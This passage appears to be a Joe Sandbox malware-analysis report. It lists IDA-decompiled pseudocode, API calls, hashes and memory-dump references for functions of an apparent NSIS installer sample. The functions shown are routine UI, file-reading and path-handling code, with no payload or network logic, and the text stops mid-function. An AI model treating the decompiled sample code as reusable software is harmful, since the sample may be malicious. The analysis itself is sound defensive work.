lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,004033ED), ref: 004055C4
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000), ref: 00406743

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll, xrefs: 0040558A, 0040559A, 004055A0, 004055C3, 004055CF

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll
API String ID: 1495540970-2411611874
Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044dc
0x00404592
0x00000000
0x00404592
0x004044ed
0x004044f1
0x00000000
0x0040450b
0x0040450b
0x00404514
0x00000000
0x00000000
0x00404516
0x00404522
0x00404525
0x00404525
0x0040452b
0x00404531
0x00404531
0x0040453d
0x00404543
0x0040454a
0x0040454d
0x00404550
0x00404552
0x00404552
0x0040455a
0x00404560
0x00404560
0x0040456a
0x0040456f
0x00404572
0x00404577
0x0040457a
0x0040457a
0x0040458a
0x0040458a
0x00000000
0x0040458d

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406790
0x00406799
0x004067b0
0x004067b0
0x004067b7
0x004067c3
0x004067c3
0x004067c6
0x004067c9
0x004067ce
0x004067d0
0x004067d9
0x004067dd
0x004067fa
0x00406802
0x00406802
0x00406807
0x00406809
0x0040680c
0x00406811
0x00406812
0x00406816
0x00406816
0x00406817
0x0040681e
0x00406820
0x00406827
0x00000000
0x00000000
0x0040682f
0x00406835
0x00000000
0x00000000
0x00000000
0x00406835
0x0040683a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

*?|<>/":, xrefs: 004067E0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e2c
0x00404e39
0x00404e3f
0x00404e7d
0x00404e7d
0x00404e8c
0x00404e93
0x00000000
0x00404e95
0x00404e41
0x00404e50
0x00404e58
0x00404e5b
0x00404e6d
0x00404e73
0x00404e7a
0x00000000
0x00404e7a
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32 ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, "Calibri New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Strings

Calibri New Roman, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Calibri New Roman
API String ID: 2584051700-2685221963
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x67da0
					_t11 =  *0x420ec4; // 0x67da4
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00067DA0,00000064,00067DA4), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 73332655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E73332655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
